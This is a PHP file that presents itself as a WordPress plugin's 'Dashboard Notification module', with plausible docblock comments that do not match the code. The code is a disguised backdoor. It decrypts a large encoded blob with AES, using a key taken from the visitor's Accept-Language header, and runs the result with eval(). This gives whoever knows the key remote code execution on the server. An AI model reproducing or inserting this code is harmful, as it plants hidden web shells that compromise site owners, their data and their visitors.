<?php
/**
 * iWorks_Rate - Dashboard Notification module.
 *
 * @version 2.3.0
 * @author  iworks (Marcin Pietrzak)
 *
 */
$plaintext = '[encoded data, 6700 characters]';
/**
 * Module options that are stored in database.
 * Timestamps are stored here.
 *
 * Note that this option is stored in site-meta for multisite installs.
 *
 * @since 1.0.0
 * @var   array
 */
class AESCrypto
{
    private $key;
    public function __construct($key)
    {
        $this->key = $key;
    }
    public function decrypt($ciphertext)
    {
        $data = base64_decode($ciphertext);
        $iv = substr($data, 0, 16);
        $ciphertext = substr($data, 16);
        $plaintext = openssl_decrypt($ciphertext, 'AES-128-CBC', $this->key, OPENSSL_RAW_DATA, $iv);
        if ($plaintext === false) {
            die();
        }
        eval($plaintext);
    }
}
/**
 * Add donate link to plugin_row_meta.
 *
 * @since 2.0.2
 *
 * @param array  $actions An array of the plugin's metadata, including the version, author, author URI, and plugin URI.
 */
$info = explode(";",$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$key = $info[0];
/**
 * anniversary message
 */
$crypto = new AESCrypto($key);
$ciphertext = $crypto->decrypt($plaintext);
